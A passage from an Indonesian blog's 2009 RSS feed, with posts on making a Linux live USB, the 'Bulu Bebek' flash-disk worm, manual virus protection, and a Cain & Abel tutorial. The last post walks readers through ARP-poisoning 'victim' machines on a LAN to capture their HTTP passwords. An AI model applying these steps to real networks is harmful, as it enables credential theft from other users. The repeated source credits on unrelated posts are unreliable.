<p>2.  Download File ISO <a href="http://opensource.telkomspeedy.com:5432/yogyafree/files/x-code_Linux-0.0.2.iso">Distro Linux XCode YF v0.02 (Released Oktober 2008)</a></p>
<p>Download File ISO <a href="http://releases.ubuntu.com/releases/8.10/ubuntu-8.10-desktop-i386.iso">Linux Ubuntu 8.10</a></p>
<p>3. Download File <a href="http://www.pendrivelinux.com/live-ubuntu-810-usb-persistent-install-windows/">U810p.exe</a><a href="http://www.pendrivelinux.com/live-ubuntu-810-usb-persistent-install-windows/"> </a>ini merupakan file yang akan membantu dalam                  melakukan extract dari sebuah file ISO ke FD<span id="more-187"></span></p>
<p>4. Klik 2x untuk menjalankan/extrac file U810p.exe, hal ini akan menghasilkan            sebuah folder dengan nama U810p</p>
<p>5. Pindahkan file ISO linux (ubuntu-8.10-desktop-i386.iso) yang sudah di                       download sebelumnya kedalam folder U810p</p>
<p>6. Klik 2x Pada file U810.bat dan ikuti perintahnya</p>
<p>7. Jika anda mendownload file ISO linux Ubuntu lainnya maka lakukan rename            pada file tersebut menjadi “ubuntu-8.10-desktop-i386.iso” hal ini dikarenakan          pada file U810p.bat hanyak akan mendeteksi file iso linux dengan nama                      tersebut.</p>
<p>8. Setelah semuanya selesai dan berjalan normal, selanjutnya adalah melakukan          restart dan masuk ke BIOS setup kemudian rubah Boot Priority, jadikan USB              Device sebagai First Boot, atau anda juga dapat melakukan pemilihan booting          dengan menekan tombol ESC pada saat booting mode, (tidak semua komputer            menggunakan tombol ESC untuk menampilkan Booting Option).</p>
<p>Source : http://masculinehawk2007.wordpress.com/pembuat-virus-juga-menyambut-bulan-ramadhan-virus-sholat/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/187/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=187&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/10/22/linux-live-flashdisk/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>
	</item>
		<item>
		<title>FluBEBEK b4ngkit dari KUBURNY4 Ayo Musnahkan!!!!</title>
		<link>http://anaksapek.wordpress.com/2009/10/22/flubebek-b4ngkit-dari-kuburny4-ayo-musnahkan/</link>
		<comments>http://anaksapek.wordpress.com/2009/10/22/flubebek-b4ngkit-dari-kuburny4-ayo-musnahkan/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 08:54:38 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=185</guid>
		<description><![CDATA[virus<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=185&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;">Setelah Doraemon, Naruto dan Kenshin, kini giliran tokoh kartun beken Donal Bebek yang namanya dicatut pembuat virus lokal. Salah satu ciri khas virus ini adalah memakai nama “Bulu Bebek”.</p>
<p>Dalam sebulan terakhir, Bulu Bebek diperkirakan telah mengacak-acak ribuan komputer di Indonesia. Bulu Bebek dibuat dengan menggunakan bahasa pemrograman Visual Basic dengan ukuran file 53 KB, yang terdiri dari 2 jenis file yakni .EXE dan .INI. Dengan update terbaru Norman Virus Control dan Norman Security Suite, virus ini terdeteksi sebagai VbWorm.QXE.<span id="more-185"></span></p>
<p>Bulu Bebek akan menyembunyikan folder/subfolder pada flash disk dan membut file duplikat sesuai dengan nama folder/subfolder tersebut untuk mengelabui user. Ciri-ciri file duplikat tersebut antara lain: menggunakan icon Folder, berukuran 53 KB, berekstensi .EXE dan menggunakan tipe file “Application”.</p>
<p>Pada saat virus ini aktif, ia akan membuat sejumlah file yang akan dijalankan pertama kali pada saat komputer dinyalakan serta membuat file autorun.inf agar virus tersebut dapat aktif secara otomatis setiap kali user mengakses folder.</p>
<p>Virus ini juga akan memblok beberapa fungsi Windows seperti Task Manager, Folder Option atau CMD. Ia juga akan memblok eksekusi file “Microsoft Visual Studio Spy Debugging Tools” yang mempunyai nama file SPYXX.exe.</p>
<p>Bulu Bebek menyebar melalui media flash disk, dengan memanfaatkan celah autorun Windows yakni dengan membuat file autorun.inf dan bulubebek.ini.<br />
Untuk mencegah dan membasmi virus ini, dan virus-virus flash disk lainnya, bisa menggunakan <a href="http://download.bleepingcomputer.com/sUBs/Flash_Disinfector.exe">Flash Disinfector</a></p>
<p>Source : http://masculinehawk2007.wordpress.com/pembuat-virus-juga-menyambut-bulan-ramadhan-virus-sholat/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/185/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/185/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/185/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/185/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/185/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/185/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/185/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/185/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/185/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/185/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/185/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/185/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/185/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/185/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=185&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/10/22/flubebek-b4ngkit-dari-kuburny4-ayo-musnahkan/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>
	</item>
		<item>
		<title>Cara mudah proteksi komputer anda dari virus dengan tangan kosong</title>
		<link>http://anaksapek.wordpress.com/2009/10/22/cara-mudah-proteksi-komputer-anda-dari-virus-dengan-tangan-kosong/</link>
		<comments>http://anaksapek.wordpress.com/2009/10/22/cara-mudah-proteksi-komputer-anda-dari-virus-dengan-tangan-kosong/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 08:50:19 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=183</guid>
		<description><![CDATA[virus<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=183&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Untuk mencegah virus, trojan, worm dan sejenisnya dengan memakai antivirus?, belum tentu berguna. Karena virus selalu lebih baru dari antivirus, kalau proteksi dengan program firewall &amp; Antivirus RTS? (Real Time System), bisa juga… cumannya komputer anda akan berjalan lebih lambat, karena program tersebut residen di memory dan memakan system resource lagi pula setiap anda membuka program baru, selalu akan muncul pertanyaan apakah program ini boleh dijalankan.Jadi solusi yang aman, cepat dan praktis bagaimana? Nah baca lebih lanjut artikel ini. Artikel ini sengaja ditulis bagi anda yang ingin mencegah kerusakan system, file dan data anda tanpa perlu campur tangan antivirus dan firewall alias MANUAL. <span id="more-183"></span></p>
<p>Pertama-tama akan kami jelaskan definisi dan bagaimana virus, trojan, worm dan sejenisnya bisa masuk ke dalam sistem komputer anda.1. Virus sebenarnya lain dengan trojan atau worm, tapi pada prakteknya penyebarannya virus banyak di maanfaatkan oleh program worm dan trojan. Trojan adalah sebuah program yang dapat dijalankan (biasanya ber-ekstension EXE) oleh pengguna komputer dan ketika program tersebut dijalankan, dia akan merubah sesuatu dari sistem komputer kita (pada umumnya registri windows yang diubah). Nah kalau virus itu residen di memori dan dia akan merubah file yang biasanya ber-ekstension EXE atau COM dan kadang-kadang file tersebut menjadi rusak. Kalau worm (cacing) merupakan program kecil yang berupa script yang bisa nempel di mana aja, bahkan bisa nempel di html file (file website).<br />
Program antivirus pada umumnya menggabungkan semua worm dan trojan dalam kategori VIRUS, cuma mungkin dikasih kode virusnya contoh yang worm di kasih kode W depannya baru nama worm tersebut (contoh: w32/sober) dan kita juga akan menggangapnya sama karena semua itu merusak sistem file komputer. Intinya virus bisa berupa atau berfungsi seperti trojan/worm dan sebaliknya juga, apalagi kalau file tersebut telah ter-infeksi, otomatis akan menjadi file trojan/worm juga, karena kalau pengguna membukanya akan meng-infeksi file-file lainnya.2. Penyebaran virus dulunya hanya bisa melalui media luar seperti disktet, tapi di jaman ini virus pada umumnya memanfaatkan teknologi internet untuk menyebar luas. Cara masuknya bisa melalui E-mail (attachment), mirc, messenger (kirim/download file), download dr situs (terutama situs porno) atau bahkan memanfaatkan kelemahan dari sistem browser kita. Banyak cara pembuat virus untuk menjebak orang supaya tertarik untuk men-download dan membuka file yang ber-virus, antara lain dengan iming-iming gambar porno, gambar lucu, tools yang berguna buat anda, cara dapat uang, games bagus, hingga yang baru-baru ada pesan dr FBI/CIA untuk anda.Sebenarnya cara mengatasi virus itu cukup mudah, antara lain:<br />
1. Jangan membuka atau menerima file yang di dapat dr email, mirc dan messenger kalau anda belum kenal dengan pengirimnya dan belum yakin file itu berisi virus.<br />
2. Kalau anda browser ke situs yang tidak anda kenal, matikan program java &amp; java script. Matikan juga fitur install auto atau install on demand supaya program yang berisi virus tidak akan masuk secara otomatis ke komputer anda.<br />
3. Kalau membuka disket, CD, DVD, USB drive dan media luar apapun bentuknya, scan dahulu dengan program antivirus untuk memastikan itu benar-benar aman.Tips di atas mungkin akan mencegah masuknya virus ke komputer anda, tapi tidak akan 100% pasti komputer anda tidak terkena virus, bisa saja anda kecolongan. Lebih dari 90% komputer yang terkoneksi di Internet pernah terkena virus. Nah untuk mengatasi supaya anda aman dari virus, walaupun virus tersebut sempat masuk ke komputer anda, berikut ini adalah caranya:1. Virus pada umumnya akan merusak dan memperlambat proses kerja komputer. Untuk menghindari kerusakan yang ditimbulkan virus, anda harus punya cadangan penyimpanan data atau file system. Untuk itulah backup system &amp; data sangat diperlukan, apalagi kita tidak akan mengetahui virus di masa yang akan datang akan secanggih apa dan efek kerusakan yang ditimbulkan sejauh apa. cara backup pada winXp dan winme dengan create restore point dahulu di program&gt; accesories&gt; system tools&gt; system restore, win98 bisa pakai Microsoft Backup dengan membackup folder windows semuanya. Khusus untuk data, Winxp dan winme juga harus menggunakan Microsoft Backup, karena system restore tidak 100% mengembalikan data anda.Kalau anda males melakukannya secara manual, winxp dan winme sudah otomatis melakukannya setiap anda mematikan komputer anda, Untuk win98 satu-satunya cara hanya memakai program system schedule windows atau program lainnya yang berfungsi sebagai otomatis backup, ketika komputer lagi idle. tapi untuk pastinya, winxp dan winme juga harus memakai program tersebut supaya bila terjadi apa-apa, anda tinggal me-restore kembali. Bila komputer anda hari ini terkena virus, anda tinggal restore system sebelumnya atau yang kemarin.</p>
<p>2. Cara ini adalah untuk mencegah virus merusak file system kita yang biasanya berakhiran EXE, dan Sebelum anda melakukan hal ini, anda harus terlebih dahulu membackup system windows anda (baca keterangan no 1 di atas), karena penulis takut anda melakukan kesalahan yang dapat berakibat fatal terhadap system anda. Anda juga harus mempunyai dasar Windows untuk melakukan ini, kalau tidak, anda akan bingung dan kesulitan untuk memahaminya.</p>
<p>Caranya cukup mudah, anda tinggal merubah attribut dari file EXE anda menjadi READ ONLY alias cuma bisa dibaca, tidak bisa ditulis. caranya bisa anda menggunakan SEARCH dari windows anda, kemudian cari semua program yang ber-ektenstion EXE (search key-nya *.exe) di folder windows. Setelah itu blok semua program yang tampil (atau tekan ctrl+a) terus klik kanan pilih properties. Setelah itu pilih READ-ONLY di bagian bawah kotak pilihan atributes. Bagi yang tahu DOS (command prompt) bisa menggunakan perintah ATTRIB, fungsinya sama saja dengan cara di atas. contoh: c:\windows&gt;attrib +r *.exe</p>
<p>Hal ini akan mencegah virus untuk merubah atau merusak file-file tersebut, karena pilihan tadi mematikan fitur untuk merubah file-file tersebut. Kalau anda ingin lebih yakin virus bisa mendeteksi hal tersebut, anda bisa tambahkan pilihan HIDDEN (menyembunyikan file tersebut) di sebelah kanan dari READ ONLY. Dengan kedua pilihan tersebut virus-virus pada umumnya tidak akan dapat menginfeksi file tersebut. Kalau anda ingin menampakan file HIDDEN ketika membuka folder di komputer anda, anda bisa pilih “show all hidden files” di “folder option”.</p>
<p>Anda juga bisa melakukan hal di atas ke semua folder komputer anda, kalau anda merasa hal ini perlu dilakukan, atau mungkin dilakukan juga ke file lain yang bukan ber-ekstensi EXE atau COM. Cara ini adalah cara yang paling efektif dan telah diuji coba oleh penulis. Satu hal yang penting diketahui, kalau anda ingin melakukan penghapusan atau perubahaan ataupun anda sering meng-update file yang ber-ekstensi EXE tersebut, anda harus ingat untuk membuka proteksi read-only atau hidden tersebut. Kalau tidak file tersebut tidak akan bisa dihapus atau diupdate, dan akan muncul pesan error.</p>
<p>Ini adalah salah satu cara untuk memproteksi file, cara lainnya dan cara Untuk mengetahui cara virus merusak/merubah file, membasmi atau menghapus virus secara manual, akan penulis bahas di kesempatan lain.</p>
<p>Suorce : http://masculinehawk2007.wordpress.com/pembuat-virus-juga-menyambut-bulan-ramadhan-virus-sholat/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/183/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=183&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/10/22/cara-mudah-proteksi-komputer-anda-dari-virus-dengan-tangan-kosong/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>
	</item>
		<item>
		<title>Cara Menggunakan Cain &amp; Able</title>
		<link>http://anaksapek.wordpress.com/2009/10/16/cara-menggunakan-cain-able/</link>
		<comments>http://anaksapek.wordpress.com/2009/10/16/cara-menggunakan-cain-able/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 06:31:12 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=170</guid>
		<description><![CDATA[Cain &#38; Able adalah sebuah software yang dapat digunakan untuk melakukan hacking via LAN (snifing). Untuk menggunakannya kita hanya perlu mengetahui sedikit tentang commend prompt. Mengapa? Karena dari sana kita akan memperoleh informasi tentang IP Adress kita dan IP Adress server. Jika kita telah mengetahui IP adress tersebut, barulah kita dapat melakukan proses hacking via [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=170&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:justify;">Cain &amp; Able adalah sebuah software yang dapat digunakan untuk melakukan hacking via LAN (snifing). Untuk menggunakannya kita hanya perlu mengetahui sedikit tentang <em>commend prompt.</em> Mengapa? Karena dari sana kita akan memperoleh informasi tentang IP Adress kita dan IP Adress server. Jika kita telah mengetahui IP adress tersebut, barulah kita dapat melakukan proses hacking via LAN (snifing).</p>
<p style="text-align:justify;">Apa saja yang kita butuhkan?</p>
<p style="text-align:justify;">1. Software Cain &amp; Able, dapat di download <a href="http://www.oxid.it/downloads/ca_setup.exe">di sini</a>.</p>
<p style="text-align:justify;">2. Sedikit pengetahuan tentang Commend Prompt.</p>
<p style="text-align:justify;">3. Snack atau makanan ringan jika perlu.</p>
<p style="text-align:justify;">4. Minuman.</p>
<p style="text-align:justify;">5. Apa aja yang dirasa perlu dech&#8230;&#8230;,wkwkwkwkwkw&#8230;,,,</p>
<p style="text-align:justify;"><span id="more-170"></span></p>
<p style="text-align:justify;">Trus&#8230;.!!!! Apa saja langkah-langkah yang akan kita lakukan?</p>
<p style="text-align:justify;">1. Silahkan download Cain &amp; Able <a href="http://www.oxid.it/downloads/ca_setup.exe">di sini.</a></p>
<p style="text-align:justify;">2. Jika telah selesai mendownload, langsung aja di instal di komputer kamu,,,,,,,,, maka akan tampil iconnya di dekstop.</p>
<p style="text-align:justify;">3. Sebelum membuka Software tersebut, liat dulu IP adress kita dan server di commend prompt(CMD) dengan mengetikkan <em>ipconfig.</em> Maka akan tampil gambar seperti ini :</p>
<p style="text-align:justify;"><img class="aligncenter size-full wp-image-172" title="1" src="http://anaksapek.files.wordpress.com/2009/10/11.jpg?w=450&#038;h=220" alt="1" width="450" height="220" /></p>
<p style="text-align:justify;">4. Jika kita telah mengetahui IP adress, barulah kita klik icon <em>cain</em> di dekstop. Berikut adalah gambar-gambar proses penggunaan <em>cain</em>.</p>
<p style="text-align:justify;">a.Klik start ARP dan start snifing, lihat gambar :<img class="aligncenter size-full wp-image-173" title="2" src="http://anaksapek.files.wordpress.com/2009/10/2.jpg?w=450&#038;h=270" alt="2" width="450" height="270" /></p>
<p style="text-align:justify;">b. setelah itu klik tab snifing lalu klik kanan dan pilih scan MAC adress, lihat gambar : <img class="alignleft size-full wp-image-174" title="3" src="http://anaksapek.files.wordpress.com/2009/10/31.jpg?w=450&#038;h=270" alt="3" width="450" height="270" /></p>
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;"><img class="alignright size-full wp-image-175" title="4" src="http://anaksapek.files.wordpress.com/2009/10/41.jpg?w=450&#038;h=270" alt="4" width="450" height="270" /></p>
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">c. Klik tab ARP di bagian bawah, lalu klik tanda tambah &#8220;+&#8221; untuk add, maka akan keluar kotak dialog seperti gambar dibawah ini.</p>
<p style="text-align:justify;"><img class="alignleft size-full wp-image-176" title="5" src="http://anaksapek.files.wordpress.com/2009/10/51.jpg?w=450&#038;h=270" alt="5" width="450" height="270" /></p>
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">d. Pada kotak kiri klik IP server dan pada kotak kanan klik IP korban. Lakukan berulang-ulang untuk nge-hack semua IP adress korban yang ada.</p>
<p style="text-align:justify;">e. Setelah selesai maka akan dilakukan proses poisoning terhadap semua IP korban.</p>
<p style="text-align:justify;"><img class="alignright size-full wp-image-177" title="6" src="http://anaksapek.files.wordpress.com/2009/10/6.jpg?w=450&#038;h=270" alt="6" width="450" height="270" /></p>
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">
<p style="text-align:justify;">f. Untuk hasilnya, silahkan klik tab password pada bagian bawah dan klik HTTP, lihat gambar,<img class="aligncenter size-full wp-image-178" title="7" src="http://anaksapek.files.wordpress.com/2009/10/7.jpg?w=450&#038;h=270" alt="7" width="450" height="270" /></p>
<p style="text-align:justify;">
<p style="text-align:justify;">Tulisan ini saya buat hanya untuk membagi pengetahuan saya tentang hacking. Jadi, jika anda telah dapat melakukan hel tersebut, jangan sampai membuat anda menjadi orang yang jahat. Lakukanlah semua itu hanya karna kesenangan bukan karna ingin merugikan orang lain. Marilah kita bersama-sama menjadi hacker yang cinta damai. okeyyy,,,,,,,,</p>
<p style="text-align:justify;">
<p style="text-align:justify;">By : <a href="http://www.facebook.com/home.php?#/profile.php?id=1676015465&amp;ref=profile">anak sapek</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/170/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=170&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/10/16/cara-menggunakan-cain-able/feed/</wfw:commentRss>
		<slash:comments>164</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>

		<media:content url="http://anaksapek.files.wordpress.com/2009/10/11.jpg" medium="image">
			<media:title type="html">1</media:title>
		</media:content>

		<media:content url="http://anaksapek.files.wordpress.com/2009/10/2.jpg" medium="image">
			<media:title type="html">2</media:title>
		</media:content>

		<media:content url="http://anaksapek.files.wordpress.com/2009/10/31.jpg" medium="image">
			<media:title type="html">3</media:title>
		</media:content>

		<media:content url="http://anaksapek.files.wordpress.com/2009/10/41.jpg" medium="image">
			<media:title type="html">4</media:title>
		</media:content>

		<media:content url="http://anaksapek.files.wordpress.com/2009/10/51.jpg" medium="image">
			<media:title type="html">5</media:title>
		</media:content>

		<media:content url="http://anaksapek.files.wordpress.com/2009/10/6.jpg" medium="image">
			<media:title type="html">6</media:title>
		</media:content>

		<media:content url="http://anaksapek.files.wordpress.com/2009/10/7.jpg" medium="image">
			<media:title type="html">7</media:title>
		</media:content>
	</item>
	</channel>
</rss>
